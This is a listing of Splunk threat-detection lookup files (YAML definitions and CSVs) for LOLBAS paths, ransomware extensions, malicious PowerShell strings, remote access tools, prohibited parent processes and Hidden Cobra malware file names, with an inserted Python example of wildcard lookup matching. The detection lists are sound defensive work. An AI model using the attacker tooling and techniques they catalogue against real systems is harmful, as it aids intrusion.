/lookups/hijacklibs.yml:
--------------------------------------------------------------------------------
name: hijacklibs
date: 2024-12-23
version: 2
id: 00990d97-e923-4ae7-9fa0-b5033a8b0164
author: Splunk Threat Research Team
lookup_type: csv
description: A list of potentially abused libraries in Windows
match_type:
- WILDCARD(library)
min_matches: 1
case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/hijacklibs_loaded.yml:
--------------------------------------------------------------------------------
name: hijacklibs_loaded
date: 2024-12-23
version: 2
id: 0a58a703-3a7a-4b27-a82b-f5a61acd3f1a
author: Splunk Threat Research Team
lookup_type: csv
description: A list of potentially abused libraries in Windows
default_match: false
match_type:
- WILDCARD(library)
- WILDCARD(excludes)
min_matches: 1
case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/images_to_repository.csv:
--------------------------------------------------------------------------------
image, repository
devsecops/cat_dog_client, splunk/devsecops_poc
devsecops/cat_dog_server, splunk/devsecops_poc
--------------------------------------------------------------------------------
/lookups/images_to_repository.yml:
--------------------------------------------------------------------------------
name: images_to_repository
date: 2024-12-23
version: 2
id: 68205e30-0097-4138-b01d-f4e4d21a86f6
author: Splunk Threat Research Team
lookup_type: csv
description: Mapping images to repositories
--------------------------------------------------------------------------------
/lookups/is_net_windows_file.yml:
--------------------------------------------------------------------------------
name: is_net_windows_file
date: 2024-12-23
version: 2
id: 891cfb79-06cd-455d-9cf8-b4d4de2bff25
author: Splunk Threat Research Team
lookup_type: csv
description: A full baseline of executable files in \Windows\, including sub-directories from Server 2016 and Windows 11. Certain .net binaries may not have been captured due to different Windows SDK's or developer utilities not installed during baseline.
min_matches: 1
case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/is_nirsoft_software.yml:
--------------------------------------------------------------------------------
name: is_nirsoft_software
date: 2025-04-24
version: 3
id: 28966a08-55e4-4ccb-a20d-dc4cc154b09c
author: Splunk Threat Research Team
lookup_type: csv
description: A subset of utilities provided by NirSoft that may be used by adversaries.
min_matches: 1
case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/is_suspicious_file_extension_lookup.yml:
--------------------------------------------------------------------------------
name: is_suspicious_file_extension_lookup
date: 2024-12-23
version: 2
id: 183b3599-4fbd-4b76-bff0-9d689ed05e17
author: Splunk Threat Research Team
lookup_type: csv
description: A list of suspicious extensions for email attachments
match_type:
- WILDCARD(file_name)
--------------------------------------------------------------------------------
/lookups/is_windows_system_file.yml:
--------------------------------------------------------------------------------
name: is_windows_system_file
date: 2024-12-23
version: 2
id: ce238622-4d8f-41a4-a747-5d0adab9c854
author: Splunk Threat Research Team
lookup_type: csv
description: A full baseline of executable files in Windows\System32 and Windows\Syswow64, including sub-directories from Server 2016 and Windows 10.
min_matches: 1
case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/k8s_container_network_io_baseline.yml:
--------------------------------------------------------------------------------
name: k8s_container_network_io_baseline
date: 2024-12-23
version: 2
id: ce26ec18-c6da-4110-ac3f-8bd239d045b3
author: Splunk Threat Research Team
lookup_type: kvstore
description: A place holder for a list of used Kuberntes Container Network IO
fields:
- _key
- avg_outbound_network_io
- avg_inbound_network_io
- stdev_outbound_network_io
- stdev_inbound_network_io
- count
- last_seen
--------------------------------------------------------------------------------
/lookups/k8s_container_network_io_ratio_baseline.yml:
--------------------------------------------------------------------------------
name: k8s_container_network_io_ratio_baseline
date: 2024-12-23
version: 2
id: fdb4f703-0378-4803-9300-92f562e1b840
author: Splunk Threat Research Team
lookup_type: kvstore
description: A place holder for a list of used Kuberntes Container Network IO Ratio
fields:
- _key
- avg_outbound_network_io
- avg_inbound_network_io
- stdev_outbound_network_io
- stdev_inbound_network_io
- count
- last_seen
--------------------------------------------------------------------------------
/lookups/k8s_process_resource_ratio_baseline.yml:
--------------------------------------------------------------------------------
name: k8s_process_resource_ratio_baseline
date: 2024-12-23
version: 2
id: 7bfd9071-fb1f-4673-ab84-6396a0d3d412
author: Splunk Threat Research Team
lookup_type: kvstore
description: A place holder for a list of used Kuberntes Process Ratios
fields:
- _key
- avg_cpu:mem
- stdev_cpu:mem
- avg_cpu:disk
- stdev_cpu:disk
- avg_mem:disk
- stdev_mem:disk
- avg_cpu:threads
- stdev_cpu:threads
- avg_disk:threads
- avg_disk:threads
- count
- last_seen
--------------------------------------------------------------------------------
/lookups/legit_domains.csv:
--------------------------------------------------------------------------------
domain, isLegit
amazon.com, True
ssl-images-amazon.com, True
facebook.com, True
xx.fbcdn.net, True
github.com, True
githubassets.com, True
instagram.com, True
linkedin.com, True
microsoftonline.com, True
office.com, True
okta.com, True
live.com, True
protonmail.com, True
reddit.com, True
redditstatic.com, True
twitter.com, True
twimg.com, True
google.com, True
--------------------------------------------------------------------------------
/lookups/legit_domains.yml:
--------------------------------------------------------------------------------
name: legit_domains
date: 2024-12-23
version: 2
id: 06602f3e-0dcc-47ef-aabc-85a4ad782442
author: Splunk Threat Research Team
lookup_type: csv
description: A list of legit domains to be used as an ignore list for possible phishing sites
--------------------------------------------------------------------------------
/lookups/linux_tool_discovery_process.yml:
--------------------------------------------------------------------------------
name: linux_tool_discovery_process
date: 2024-12-23
version: 2
id: f0d8b1c8-4ca0-4765-858a-ab0dea68c399
author: Splunk Threat Research Team
lookup_type: csv
description: A list of suspicious bash commonly used by attackers via scripts
match_type:
- WILDCARD(process)
min_matches: 1
case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/local_file_inclusion_paths.yml:
--------------------------------------------------------------------------------
name: local_file_inclusion_paths
date: 2024-12-23
version: 2
id: 10efe0a8-ec54-4f86-8d11-677a7ac65d64
author: Splunk Threat Research Team
lookup_type: csv
description: A list of files commonly targeted in local file inclusion attacks
match_type:
  - WILDCARD(local_file_inclusion_paths)
min_matches: 1
case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/lolbas_file_path.yml:
--------------------------------------------------------------------------------
name: lolbas_file_path
date: 2024-12-23
version: 2
id: b88d9c91-33c6-408a-8ef0-00806932f8c5
author: Splunk Threat Research Team
lookup_type: csv
description: A list of LOLBAS binaries and their expected file paths, used to determine whether a script or binary is running from its legitimate location on Windows. Updated for 2024 from the LOLBAS project.
default_match: false
match_type:
  - WILDCARD(lolbas_file_name)
  - WILDCARD(lolbas_file_path)
min_matches: 1
max_matches: 1
case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/loldrivers.yml:
--------------------------------------------------------------------------------
name: loldrivers
date: 2024-12-23
version: 2
id: a4c71880-bb4a-4e2c-9b44-be70cf181fb3
author: Splunk Threat Research Team
lookup_type: csv
description: A list of known vulnerable drivers
match_type:
  - WILDCARD(driver_name)
min_matches: 1
case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/lookup_rare_process_allow_list_default.csv:
--------------------------------------------------------------------------------
process,allow_list
splunk-regmon.exe,true
winword.exe,true
excel.exe,true
outlook.exe,true
powerpnt.exe,true
visio.exe,true
--------------------------------------------------------------------------------
/lookups/lookup_rare_process_allow_list_default.yml:
--------------------------------------------------------------------------------
name: lookup_rare_process_allow_list_default
date: 2024-12-23
version: 2
id: fc0c452e-47b1-4931-ba41-de5b7c6ed92b
author: Splunk Threat Research Team
lookup_type: csv
case_sensitive_match: false
description: A list of rare but legitimate processes, provided by Splunk
match_type:
  - WILDCARD(process)
min_matches: 1
--------------------------------------------------------------------------------
/lookups/lookup_rare_process_allow_list_local.csv:
--------------------------------------------------------------------------------
process,allow_list
--------------------------------------------------------------------------------
/lookups/lookup_rare_process_allow_list_local.yml:
--------------------------------------------------------------------------------
name: lookup_rare_process_allow_list_local
date: 2024-12-23
version: 2
id: 7aec9c17-69b8-4a0b-8f8d-d3ea9b0e2adb
author: Splunk Threat Research Team
lookup_type: csv
case_sensitive_match: false
description: A list of rare but legitimate processes, provided by the end user
match_type:
  - WILDCARD(process)
min_matches: 1
--------------------------------------------------------------------------------
/lookups/lookup_uncommon_processes_default.yml:
--------------------------------------------------------------------------------
name: lookup_uncommon_processes_default
date: 2024-12-23
version: 2
id: 486eba44-2238-4246-98ca-1ff9b6e1c023
author: Splunk Threat Research Team
lookup_type: csv
case_sensitive_match: false
description: A list of processes that are not common
match_type:
  - WILDCARD(process)
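The CSV lookups above (lolbas_file_path, loldrivers, the rare-process allow lists) all lean on the same handful of transforms options: a WILDCARD match_type, min_matches, max_matches, default_match and case_sensitive_match. The Python below is an added example, not code from this repository, that reimplements those semantics over in-memory rows so the behaviour can be checked offline. The LOLBAS rows and the single local allow-list row are constructed stand-ins for files not shown on this page, and lolbas_path_check and is_allow_listed are illustrative helpers, not the project's own searches.

```python
import csv
import io
import re
from typing import Dict, List, Set

# Constructed stand-in for lookups/lolbas_file_path.csv, which is not on this
# page (the real file is generated from the LOLBAS project). Illustrative only.
LOLBAS_CSV = r"""lolbas_file_name,lolbas_file_path,description
certutil.exe,C:\Windows\System32\certutil.exe,Certificate utility
certutil.exe,C:\Windows\SysWOW64\certutil.exe,Certificate utility
msbuild.exe,C:\Windows\Microsoft.NET\Framework*\*\MSBuild.exe,Build engine
"""
# Rows of lookups/lookup_rare_process_allow_list_default.csv as shown on the page.
ALLOW_DEFAULT_CSV = """process,allow_list
splunk-regmon.exe,true
winword.exe,true
excel.exe,true
outlook.exe,true
powerpnt.exe,true
visio.exe,true
"""
# The local allow list ships with a header only; this constructed row stands in
# for an entry an end user would add (wildcards are allowed in the process field).
ALLOW_LOCAL_CSV = """process,allow_list
backup-agent-*.exe,true
"""


def load_csv(text: str) -> List[Dict[str, str]]:
    return list(csv.DictReader(io.StringIO(text)))


def wildcard_to_regex(pattern: str, case_sensitive: bool) -> "re.Pattern[str]":
    """WILDCARD(field): '*' matches any run of characters, everything else is
    literal. Unlike fnmatch there is no '?' and no character class."""
    body = ".*".join(re.escape(part) for part in pattern.split("*"))
    return re.compile(body, 0 if case_sensitive else re.IGNORECASE)


def lookup(rows: List[Dict[str, str]], inputs: Dict[str, str], wildcard_fields: Set[str], *,
           min_matches: int = 1, max_matches=None, case_sensitive_match: bool = False,
           default_match=None) -> List[Dict[str, str]]:
    """Mimic `| lookup <name> <inputs...> OUTPUT <remaining fields>` for a CSV lookup
    using the options the YAML files on this page declare:
      match_type WILDCARD(f)    -> the lookup value of f is a '*' pattern
      case_sensitive_match      -> applies to wildcard and exact fields alike
                                   (defaults here follow the page's files, not Splunk's default)
      max_matches               -> cap on returned rows (None = no cap)
      min_matches/default_match -> if fewer than min_matches rows match and default_match
                                   is set, one row carrying default_match in every output
                                   field is returned instead of nothing."""
    def field_matches(field: str, lookup_value: str, event_value: str) -> bool:
        if field in wildcard_fields:
            return wildcard_to_regex(lookup_value, case_sensitive_match).fullmatch(event_value) is not None
        if case_sensitive_match:
            return lookup_value == event_value
        return lookup_value.lower() == event_value.lower()

    output_fields = [f for f in (rows[0].keys() if rows else []) if f not in inputs]
    matched = [row for row in rows if all(field_matches(f, row[f], v) for f, v in inputs.items())]
    if max_matches is not None:
        matched = matched[:max_matches]
    if len(matched) < min_matches and default_match is not None:
        return [{f: default_match for f in output_fields}]
    return [{f: row[f] for f in output_fields} for row in matched]


LOLBAS_ROWS = load_csv(LOLBAS_CSV)
ALLOW_ROWS = load_csv(ALLOW_DEFAULT_CSV) + load_csv(ALLOW_LOCAL_CSV)


def lolbas_path_check(process_name: str, process_path: str) -> str:
    """Classify an observed process as 'not_lolbas', 'expected' (a LOLBAS name running
    from one of its catalogued paths) or 'unexpected_path' (a LOLBAS name copied or
    renamed elsewhere, the masquerading case the lookup exists to catch)."""
    if not lookup(LOLBAS_ROWS, {"lolbas_file_name": process_name}, {"lolbas_file_name"}):
        return "not_lolbas"
    hit = lookup(LOLBAS_ROWS,
                 {"lolbas_file_name": process_name, "lolbas_file_path": process_path},
                 {"lolbas_file_name", "lolbas_file_path"},
                 min_matches=1, max_matches=1, default_match="false")
    return "expected" if hit[0]["description"] != "false" else "unexpected_path"


def is_allow_listed(process_name: str) -> bool:
    """Consult the Splunk-provided and the end-user allow lists together, as a
    rare-process detection would before alerting."""
    hit = lookup(ALLOW_ROWS, {"process": process_name}, {"process"},
                 min_matches=1, default_match="false")
    return hit[0]["allow_list"].lower() == "true"


if __name__ == "__main__":
    for name, path in [("certutil.exe", r"C:\Windows\System32\certutil.exe"),
                       ("certutil.exe", r"C:\Users\Public\certutil.exe"),
                       ("msbuild.exe", r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe")]:
        print(f"{path}: {lolbas_path_check(name, path)}")
    print("WINWORD.EXE allow-listed:", is_allow_listed("WINWORD.EXE"))
```

Two things worth noticing when tuning these lookups: with default_match set, a miss does not drop the event but returns the literal default in the output field, so a detection has to compare against that string rather than test for a null; and a `*` in the lookup column is honoured only for fields named in match_type, so a wildcard added to a column without a WILDCARD(...) entry is matched as the literal asterisk.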
--------------------------------------------------------------------------------
/lookups/lookup_uncommon_processes_local.csv:
--------------------------------------------------------------------------------
process_name,uncommon_local,category_local,analytic_story_local,kill_chain_phase_local,mitre_attack_local
--------------------------------------------------------------------------------
/lookups/lookup_uncommon_processes_local.yml:
--------------------------------------------------------------------------------
name: lookup_uncommon_processes_local
date: 2024-12-23
version: 2
id: 3ece1ae5-4389-485e-b2b9-4cafdb6924dc
author: Splunk Threat Research Team
lookup_type: csv
case_sensitive_match: false
description: A list of processes that are not common
match_type:
  - WILDCARD(process)
--------------------------------------------------------------------------------
/lookups/malicious_powershell_strings.yml:
--------------------------------------------------------------------------------
name: malicious_powershell_strings
date: 2025-03-03
version: 2
id: d2fcf9eb-c7a4-4b05-9db4-99c6430d0513
author: Steven Dick
lookup_type: csv
description: A list of commands and cmdlets used by known malicious PowerShell tooling.
match_type:
  - WILDCARD(command)
min_matches: 1
max_matches: 1
case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/mandatory_job_for_workflow.csv:
--------------------------------------------------------------------------------
workflow_name,job_name
deployment,k8s-security
--------------------------------------------------------------------------------
/lookups/mandatory_job_for_workflow.yml:
--------------------------------------------------------------------------------
name: mandatory_job_for_workflow
date: 2024-12-23
version: 2
id: 76d805e3-b538-43c7-bd8b-f5fd62af596a
author: Splunk Threat Research Team
lookup_type: csv
description: A lookup file defining the mandatory job for each workflow
--------------------------------------------------------------------------------
/lookups/mandatory_step_for_job.csv:
--------------------------------------------------------------------------------
job_name,step_name
k8s-security,Run Kube Hunter
--------------------------------------------------------------------------------
/lookups/mandatory_step_for_job.yml:
--------------------------------------------------------------------------------
name: mandatory_step_for_job
date: 2024-12-23
version: 2
id: ac92a35c-26c4-4f6c-a005-d152b5b343b2
author: Splunk Threat Research Team
lookup_type: csv
description: A lookup file defining the mandatory step for each job
--------------------------------------------------------------------------------
/lookups/msad_guid_lookup.yml:
--------------------------------------------------------------------------------
name: msad_guid_lookup
date: 2024-12-23
version: 2
id: d8812c9c-9a4c-4b4b-9995-31db35c0b8cf
author: Splunk Threat Research Team
lookup_type: csv
description: A lookup file that will contain translations for
  AD object ACE control access rights GUIDs
--------------------------------------------------------------------------------
/lookups/network_acl_activity_baseline.csv:
--------------------------------------------------------------------------------
arn,latestCount,numDataPoints,avgApiCalls,stdevApiCalls
--------------------------------------------------------------------------------
/lookups/network_acl_activity_baseline.yml:
--------------------------------------------------------------------------------
name: network_acl_activity_baseline
date: 2024-12-23
version: 2
id: 779e0050-a97a-49d2-8aa0-3640d4829b30
author: Splunk Threat Research Team
description: A lookup file that will contain the baseline of AWS network ACL API call counts per ARN
lookup_type: csv
--------------------------------------------------------------------------------
/lookups/previously_seen_api_calls_from_user_roles.yml:
--------------------------------------------------------------------------------
name: previously_seen_api_calls_from_user_roles
date: 2024-12-23
version: 2
id: 80620693-2a0f-4c17-8579-2f9a6a2bfa15
author: Splunk Threat Research Team
lookup_type: kvstore
description: A placeholder for the list of API calls (eventName) previously seen from each user or role, with the earliest and latest time observed
fields:
  - _key
  - earliest
  - latest
  - userName
  - eventName
--------------------------------------------------------------------------------
/lookups/previously_seen_aws_cross_account_activity.yml:
--------------------------------------------------------------------------------
name: previously_seen_aws_cross_account_activity
date: 2024-12-23
version: 2
id: fffe4494-7356-4448-a8c0-fd266d51f318
author: Splunk Threat Research Team
lookup_type: kvstore
description: A placeholder for a list of AWS accounts and assumed roles
fields:
  - _key
  - firstTime
  - lastTime
  - requestingAccountId
  - requestedAccountId
--------------------------------------------------------------------------------
/lookups/previously_seen_aws_regions.yml:
--------------------------------------------------------------------------------
name: previously_seen_aws_regions
date: 2024-12-23
version: 2
id: 804c385e-5942-4e0c-87eb-69890483fe73
author: Splunk Threat Research Team
lookup_type: kvstore
description: A placeholder for the list of previously seen AWS regions
fields:
  - _key
  - earliest
  - latest
  - awsRegion
--------------------------------------------------------------------------------
/lookups/previously_seen_cloud_api_calls_per_user_role.yml:
--------------------------------------------------------------------------------
name: previously_seen_cloud_api_calls_per_user_role
date: 2024-12-23
version: 2
id: 3684fed6-6f6a-4830-a3b3-453898fc2a46
author: Splunk Threat Research Team
lookup_type: kvstore
description: A table of users, commands, and the first and last time that they have been seen
fields:
  - _key
  - user
  - command
  - firstTimeSeen
  - lastTimeSeen
  - enough_data
--------------------------------------------------------------------------------
/lookups/previously_seen_cloud_compute_creations_by_user.yml:
--------------------------------------------------------------------------------
name: previously_seen_cloud_compute_creations_by_user
date: 2024-12-23
version: 2
id: cfd1a79b-0b98-42b9-bc0d-2464f74321e5
author: Splunk Threat Research Team
description: A table of previously seen users creating cloud instances
lookup_type: kvstore
fields:
  - _key
  - firstTimeSeen
  - lastTimeSeen
  - user
  - enough_data
--------------------------------------------------------------------------------
/lookups/previously_seen_cloud_compute_images.yml:
--------------------------------------------------------------------------------
name: previously_seen_cloud_compute_images
date: 2024-12-23
version: 2
id: ef8c1c7d-19eb-41d6-b6a1-9fc5ce5fc477
author: Splunk Threat Research Team
description: A table of previously seen cloud image IDs
lookup_type: kvstore
fields:
  - _key
  - firstTimeSeen
  - lastTimeSeen
  - image_id
  - enough_data
--------------------------------------------------------------------------------
/lookups/previously_seen_cloud_compute_instance_types.yml:
--------------------------------------------------------------------------------
name: previously_seen_cloud_compute_instance_types
date: 2024-12-23
version: 2
id: ae42b151-d5cd-4010-a414-af307f210726
author: Splunk Threat Research Team
description: A placeholder for the list of previously seen cloud compute instance types
lookup_type: kvstore
fields:
  - _key
  - firstTimeSeen
  - lastTimeSeen
  - instance_type
  - enough_data
--------------------------------------------------------------------------------
/lookups/previously_seen_cloud_instance_modifications_by_user.yml:
--------------------------------------------------------------------------------
name: previously_seen_cloud_instance_modifications_by_user
date: 2024-12-23
version: 2
id: d44862cb-39af-435e-9a1b-7fd087b0901a
author: Splunk Threat Research Team
description: A table of users seen making instance modifications, and the first and last time that the activity was observed
lookup_type: kvstore
fields:
  - _key
  - firstTimeSeen
  - lastTimeSeen
  - user
  - enough_data
--------------------------------------------------------------------------------
/lookups/previously_seen_cloud_provisioning_activity_sources.yml:
--------------------------------------------------------------------------------
name: previously_seen_cloud_provisioning_activity_sources
date: 2024-12-23
version: 2
id: be904c28-37df-4d3e-955a-ead70a537327
author: Splunk Threat Research Team
description: A table of source IPs, their geographic locations, and the first and last time they were seen performing cloud provisioning activities
lookup_type: kvstore
fields:
  - _key
  - src
  - City
  - Country
  - Region
  - firstTimeSeen
  - lastTimeSeen
  - enough_data
--------------------------------------------------------------------------------
/lookups/previously_seen_cloud_regions.yml:
--------------------------------------------------------------------------------
name: previously_seen_cloud_regions
date: 2024-12-23
version: 2
id: 4a030fa6-a2eb-4058-9f65-fde1746d1bec
author: Splunk Threat Research Team
lookup_type: kvstore
description: A table of vendor_region values and the first and last time that they have been observed in cloud provisioning activities
fields:
  - _key
  - firstTimeSeen
  - lastTimeSeen
  - vendor_region
  - enough_data
--------------------------------------------------------------------------------
/lookups/previously_seen_cmd_line_arguments.csv:
--------------------------------------------------------------------------------
firstTime,lastTime,process
--------------------------------------------------------------------------------
/lookups/previously_seen_cmd_line_arguments.yml:
--------------------------------------------------------------------------------
name: previously_seen_cmd_line_arguments
date: 2024-12-23
version: 2
id: d8be0813-d09e-4fb8-8999-641d2f4b80e1
author: Splunk Threat Research Team
description: A placeholder for the list of command line arguments that have been seen before
lookup_type: csv
--------------------------------------------------------------------------------
/lookups/previously_seen_ec2_amis_lookup.yml:
--------------------------------------------------------------------------------
name:
  previously_seen_ec2_amis_lookup
date: 2025-01-16
version: 2
id: a0d24031-61b5-44b8-89f9-17f844415b8a
author: Splunk Threat Research Team
lookup_type: kvstore
description: A placeholder for the list of previously seen EC2 AMIs
fields:
  - _key
  - firstTime
  - lastTime
  - amiID
--------------------------------------------------------------------------------
/lookups/previously_seen_ec2_instance_types_lookup.yml:
--------------------------------------------------------------------------------
name: previously_seen_ec2_instance_types_lookup
date: 2025-01-16
version: 2
id: 37507f63-27c5-488e-ba5b-cf38274997ff
author: Splunk Threat Research Team
lookup_type: kvstore
description: A placeholder for the list of previously seen EC2 instance types.
fields:
  - _key
  - earliest
  - latest
  - instanceType
--------------------------------------------------------------------------------
/lookups/previously_seen_ec2_launches_by_user_lookup.yml:
--------------------------------------------------------------------------------
name: previously_seen_ec2_launches_by_user_lookup
date: 2025-01-16
version: 2
id: a4a6d268-3c88-4996-b634-2edc33344a0a
author: Splunk Threat Research Team
lookup_type: kvstore
description: A placeholder for the list of previously seen EC2 launches by user
fields:
  - _key
  - firstTime
  - lastTime
  - arn
--------------------------------------------------------------------------------
/lookups/previously_seen_ec2_modifications_by_user.csv:
--------------------------------------------------------------------------------
arn,firstTime,lastTime
--------------------------------------------------------------------------------
/lookups/previously_seen_ec2_modifications_by_user.yml:
--------------------------------------------------------------------------------
name: previously_seen_ec2_modifications_by_user
date: 2024-12-23
version: 2
id: 546fa1b4-02d4-4e53-96be-0825a9b95625
author: Splunk Threat Research Team
description: A placeholder for the list of AWS EC2 modifications made by each user
lookup_type: csv
--------------------------------------------------------------------------------
/lookups/previously_seen_gcp_storage_access_from_remote_ip.yml:
--------------------------------------------------------------------------------
name: previously_seen_gcp_storage_access_from_remote_ip
date: 2024-12-23
version: 2
id: 343f625b-79a2-4ce6-82f2-90abde577371
author: Splunk Threat Research Team
lookup_type: kvstore
description: A placeholder for the list of GCP storage accesses from remote IPs
fields:
  - _key
  - firstTime
  - lastTime
  - bucket_name
  - remote_ip
  - operation
  - request_uri
--------------------------------------------------------------------------------
/lookups/previously_seen_provisioning_activity_src.yml:
--------------------------------------------------------------------------------
name: previously_seen_provisioning_activity_src
date: 2024-12-23
version: 1
id: aa2db10e-465d-4828-88d4-545a35707b81
author: Splunk Threat Research Team
lookup_type: kvstore
description: A placeholder for the list of previously seen AWS provisioning activity sources
fields:
  - _key
  - firstTime
  - lastTime
  - sourceIPAddress
  - City
  - Region
  - Country
--------------------------------------------------------------------------------
/lookups/previously_seen_running_windows_services.yml:
--------------------------------------------------------------------------------
name: previously_seen_running_windows_services
date: 2024-12-23
version: 2
id: d997cadc-75ac-48a5-bebc-ccbc94c4023a
author: Splunk Threat Research Team
lookup_type: kvstore
description: A placeholder for the list of Windows services seen running
fields:
  - _key
  - service
  - firstTimeSeen
  - lastTimeSeen
--------------------------------------------------------------------------------
/lookups/previously_seen_s3_access_from_remote_ip.yml:
--------------------------------------------------------------------------------
name: previously_seen_S3_access_from_remote_ip
date: 2024-12-23
version: 2
id: 264e5f12-ba04-47d1-bb88-f355a9b2b0e8
author: Splunk Threat Research Team
lookup_type: kvstore
description: A placeholder for the list of remote IPs that have accessed each S3 bucket
fields:
  - _key
  - bucket_name
  - remote_ip
  - earliest
  - latest
--------------------------------------------------------------------------------
/lookups/previously_seen_users_console_logins.yml:
--------------------------------------------------------------------------------
name: previously_seen_users_console_logins
date: 2024-12-23
version: 2
id: 308257b9-a0c6-4ca5-9602-efcab78f45ff
author: Splunk Threat Research Team
lookup_type: kvstore
description: A table of users seen performing console logins, and the first and last time that the activity was observed
fields:
  - _key
  - firstTime
  - lastTime
  - user
  - src
  - City
  - Region
  - Country
--------------------------------------------------------------------------------
/lookups/privileged_azure_ad_roles.yml:
--------------------------------------------------------------------------------
name: privileged_azure_ad_roles
date: 2024-12-23
version: 2
id: 4dbf0357-b5fc-4be2-9058-804d6a60b126
author: Splunk Threat Research Team
lookup_type: csv
description: A list of privileged Azure Active Directory roles, including 2024 updates and role template IDs.
match_type:
  - WILDCARD(azureadrole)
  - WILDCARD(azuretemplateid)
min_matches: 1
case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/prohibited_apps_launching_cmd.csv:
--------------------------------------------------------------------------------
prohibited_applications,isProhibited
winword.exe,prohibited
EXCEL.EXE,prohibited
OUTLOOK.EXE,prohibited
POWERPNT.EXE,prohibited
visio.exe,prohibited
mspub.exe,prohibited
Acrobat.exe,prohibited
Acrord32.exe,prohibited
chrome.exe,prohibited
iexplore.exe,prohibited
opera.exe,prohibited
firefox.exe,prohibited
java.exe,prohibited
powershell.exe,prohibited
mshta.exe,prohibited
zoom.exe,prohibited
node.exe,prohibited
--------------------------------------------------------------------------------
/lookups/prohibited_apps_launching_cmd.yml:
--------------------------------------------------------------------------------
name: prohibited_apps_launching_cmd
date: 2024-12-23
version: 2
id: e6ac9b38-051b-4e40-afd1-16837ddfe7fc
author: Splunk Threat Research Team
lookup_type: csv
description: A list of processes that should not be launching cmd.exe
match_type:
  - WILDCARD(prohibited_applications)
--------------------------------------------------------------------------------
/lookups/prohibited_processes.yml:
--------------------------------------------------------------------------------
name: prohibited_processes
date: 2024-12-23
version: 2
id: 310910fe-5158-4f87-8e45-9a307b6ffa8c
author: Splunk Threat Research Team
lookup_type: csv
description: A list of processes that have been marked as prohibited
--------------------------------------------------------------------------------
/lookups/ransomware_extensions_lookup.yml:
--------------------------------------------------------------------------------
name: ransomware_extensions_lookup
date: 2025-03-18
version: 3
id: eaf9e6bb-55fa-4bab-89a5-b0229638c526
author: Splunk Threat Research Team
lookup_type: csv
description: A list of file extensions that are associated with ransomware
match_type:
  - WILDCARD(Extensions)
min_matches: 1
case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/ransomware_notes_lookup.yml:
--------------------------------------------------------------------------------
name: ransomware_notes_lookup
date: 2025-03-03
version: 3
id: 93d9fb06-035e-496c-91d5-7a79543ce1e1
author: Splunk Threat Research Team
lookup_type: csv
description: A list of file names that are ransomware note files
match_type:
  - WILDCARD(ransomware_notes)
min_matches: 1
case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/remote_access_software.yml:
--------------------------------------------------------------------------------
name: remote_access_software
date: 2025-04-04
version: 4
id: f3b92ff9-667c-481f-b29d-458e10d48508
author: Splunk Threat Research Team
lookup_type: csv
description: A list of remote access software
match_type:
  - WILDCARD(remote_utility)
  - WILDCARD(remote_domain)
  - WILDCARD(remote_utility_fileinfo)
min_matches: 1
max_matches: 1
case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/remote_access_software_exceptions.yml:
--------------------------------------------------------------------------------
name: remote_access_software_exceptions
date: 2024-12-23
version: 2
id: 2742e885-0706-494b-8f56-a90a3e8d33b4
author: Splunk Threat Research Team
lookup_type: kvstore
description: A list used to provide global exceptions to remote access monitoring content.
fields:
  - _key
  - asset
  - software
  - exception_date
  - exception_ttl_days
  - exception
  - comment
--------------------------------------------------------------------------------
/lookups/s3_deletion_baseline.yml:
--------------------------------------------------------------------------------
name: s3_deletion_baseline
date: 2024-12-23
version: 2
id: 45e5d266-f80b-43f8-b4a7-87e070da4e70
author: Splunk Threat Research Team
lookup_type: kvstore
description: A placeholder for the baseline information for AWS S3 deletions
fields:
  - _key
  - arn
  - latestCount
  - numDataPoints
  - avgApiCalls
  - stdevApiCalls
--------------------------------------------------------------------------------
/lookups/security_group_activity_baseline.yml:
--------------------------------------------------------------------------------
name: security_group_activity_baseline
date: 2024-12-23
version: 2
id: 2e110067-48ac-42bd-84a8-a97861edf80d
author: Splunk Threat Research Team
description: A placeholder for the baseline information for AWS security groups
lookup_type: kvstore
fields:
  - _key
  - arn
  - latestCount
  - numDataPoints
  - avgApiCalls
  - stdevApiCalls
--------------------------------------------------------------------------------
/lookups/security_services_lookup.yml:
--------------------------------------------------------------------------------
name: security_services_lookup
date: 2025-01-29
version: 4
id: c9038bad-c77b-4caa-9df2-09dc4454ac77
author: Splunk Threat Research Team
lookup_type: csv
description: A list of services that deal with security, such as antivirus, endpoint detection and response, etc.
match_type:
  - WILDCARD(service)
min_matches: 1
case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/sslbl_ssl_certificate_blacklist.yml:
--------------------------------------------------------------------------------
name: sslbl_ssl_certificate_blacklist
date: 2025-04-03
version: 1
id: 5850e5c3-543c-45b8-8b82-147ed49aba55
author: Splunk Threat Research Team
lookup_type: csv
case_sensitive_match: false
description: abuse.ch SSLBL SSL Certificate Blacklist (SHA1 fingerprints)
min_matches: 1
--------------------------------------------------------------------------------
/lookups/suspicious_writes_lookup.csv:
--------------------------------------------------------------------------------
file,note
mssscardprv.ax,ESCU - File associated with Hidden Cobra malware https://www.us-cert.gov/ncas/analysis-reports/AR18-149A
scardprv.dll,ESCU - File associated with Hidden Cobra malware https://www.us-cert.gov/ncas/analysis-reports/AR18-149A
wmmvsvc.dll,ESCU - File associated with Hidden Cobra malware https://www.us-cert.gov/ncas/analysis-reports/AR18-149A
--------------------------------------------------------------------------------
/lookups/suspicious_writes_lookup.yml:
--------------------------------------------------------------------------------
name: suspicious_writes_lookup
date: 2024-12-23
version: 2
id: 4a189c42-84d1-49b6-817e-7bc59318f960
author: Splunk Threat Research Team
lookup_type: csv
description: A list of suspicious file names
match_type:
  - WILDCARD(file)
min_matches: 1
--------------------------------------------------------------------------------
/lookups/threat_snort_count.yml:
--------------------------------------------------------------------------------
name: threat_snort_count
date: 2025-05-13
version: 1
id: 48a35e07-ed5f-42f9-a5da-b7f2ab892e3c
